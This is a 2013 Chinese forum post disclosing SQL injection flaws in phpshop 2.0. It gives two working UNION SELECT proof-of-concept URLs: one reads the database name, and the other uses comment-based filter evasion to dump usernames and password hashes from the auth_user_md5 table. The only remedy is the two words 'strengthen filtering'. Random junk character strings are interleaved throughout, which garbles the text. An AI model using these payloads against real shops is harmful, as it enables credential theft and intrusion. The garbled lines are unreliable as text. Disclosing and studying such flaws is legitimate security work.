找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1945|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability
! T, _) a+ p4 W2 U+ h/ X$ C3 Y0 v, {7 r
作者 : By onestree. x9 R" R- s1 E& O) v) |7 Y* p! a
下载地址 : http://code.google.com/p/phpshop/downloads/list% p; F. J; X# G- I8 w9 K8 O
测试地址: windows 7 / ubuntu5 q2 ]3 |5 L5 E0 ?) g
! ?' ~" R& Q6 o% r0 s7 l. C1 Z

, y7 Y+ M1 k# e+ aSQLi p0c:, O1 Y8 L/ ~5 Q; K/ K  ~# K! k
, [! k+ L! }, n" N/ L8 W$ g
==================- ^8 E9 t$ y2 _
7 j$ D& ]1 x3 R
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
5 p$ m8 e( d  _1 h$ t( Vunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --* C: M2 u0 t2 e( f# O  S! o& ?
6 @9 b) [5 n- {
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
/ {- k7 o+ D# p" N6 t. N1 Q2 i8 p1 W& D0 a
修复:
/ b. t, _* C* y6 m加强过滤3 R7 V, ]/ @) S# z( q

# q5 C+ {) D( g7 w; O* a
( }0 E. `2 R" `* ~2 M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表